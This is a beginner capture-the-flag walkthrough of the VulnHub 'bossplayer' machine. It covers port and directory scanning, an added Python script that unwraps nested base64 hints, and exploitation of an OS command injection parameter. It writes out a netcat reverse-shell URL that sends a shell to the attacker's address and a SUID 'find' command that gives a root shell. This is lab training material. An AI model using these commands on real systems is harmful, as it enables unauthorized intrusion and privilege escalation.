bossplayer CTF walkthrough
In this article we will solve another CTF challenge. This challenge is aimed at beginners, and the machine can be downloaded from VulnHub.
The first step is to find the IP address of the target, using the command: netdiscover -i wlan0
The next step is to check for open ports, for which we used the command: nmap -A 192.168.43.152
We can see that only two ports are open: 22 (SSH) and 80 (HTTP). So we decided to browse the HTTP service by opening a browser and typing the URL 192.168.43.152:80
This is what the webpage looks like. Since there is no hint for us, we decided to look for hidden files and directories. For that we use the tool dirb, which comes preinstalled in Kali Linux. We run it with the command: dirb http://192.168.43.152
We found these 3 files. We decided to open http://192.168.43.152/robots.txt and found this:
It looks like it is encoded in base64, so we decoded it with the command: echo bG9sIHRyeSBoYXJkZXIgYnJvCg== | base64 -d
So it is useless for us!!
After this we opened the source code of the webpage, and at the end of the source code we found another base64-encoded string.
Using the same command, we decode it: echo WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK | base64 -d
After decoding the first string we get another base64-encoded string, so we decode it again, and again we get a base64-encoded string, so we decode that one too. One more time we have a string in the same format, and after decoding it we get the text workinginprogress.php. This could be a new page, so we open the URL http://192.168.43.152/workinginprogress.php
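The repeated decoding above can be automated. The following Python script is an added example, not code from the original walkthrough: it peels nested base64 layer by layer and stops at the first result that is no longer valid base64 text, so an innermost plaintext that happens to be base64-shaped is not decoded further. The two input strings are the ones quoted above, and the script reports how many decodes each one needed.

```python
import base64
import binascii
from typing import List

# Constructed from the two strings quoted in the walkthrough:
# the one served in robots.txt and the one at the bottom of the page source.
ROBOTS_STRING = "bG9sIHRyeSBoYXJkZXIgYnJvCg=="
PAGE_SOURCE_STRING = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"


def _looks_like_text(data: bytes) -> bool:
    """True when the bytes are printable ASCII (tab/newline allowed)."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\t\r\n" for ch in text)


def peel_base64(blob: str, max_depth: int = 16) -> List[str]:
    """Decode base64 repeatedly and return every layer, outermost first.

    The chain ends at the first value that is not valid base64 or that
    decodes to non-text bytes, so an innermost plaintext that happens to
    be base64-shaped is kept rather than decoded into garbage. max_depth
    bounds the loop for input that keeps looking like base64.
    """
    layers = [blob.strip()]
    for _ in range(max_depth):
        current = layers[-1]
        if not current or len(current) % 4 != 0:
            break  # base64 output is always padded to a multiple of 4
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break  # characters outside the base64 alphabet or bad padding
        if not decoded or not _looks_like_text(decoded):
            break  # binary result: real data reached, not another layer
        layers.append(decoded.decode("ascii").strip())
    return layers


if __name__ == "__main__":
    for name, blob in (("robots.txt", ROBOTS_STRING), ("page source", PAGE_SOURCE_STRING)):
        chain = peel_base64(blob)
        print(f"{name}: {len(chain) - 1} decode(s) -> {chain[-1]!r}")
```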
After thinking for a while we came up with an idea: what if we try to execute an OS command through http://192.168.43.152/workinginprogress.php?cmd=id; ? We were right: after executing this command we got the desired output.
This means we can also execute nc to get a shell. Please read the article https://www.haclabs.org/post/beginners-guide-to-netcat to learn more about nc.
So we used this URL: http://192.168.43.152/workinginprogress.php?cmd=nc -e /bin/sh 192.168.43.9 4444 to get a shell. Do not forget to start a listener on Kali Linux with the command nc -nlvp 4444 before requesting the above URL.
Now we look for SUID binaries with the command: find / -perm -u=s -type f 2>/dev/null
The find binary appears in that list with the SUID bit set, so we can use it to get a root shell with the command:
find . -exec /bin/sh -p \; -quit
So we have a root shell, and we confirmed it by executing the command id.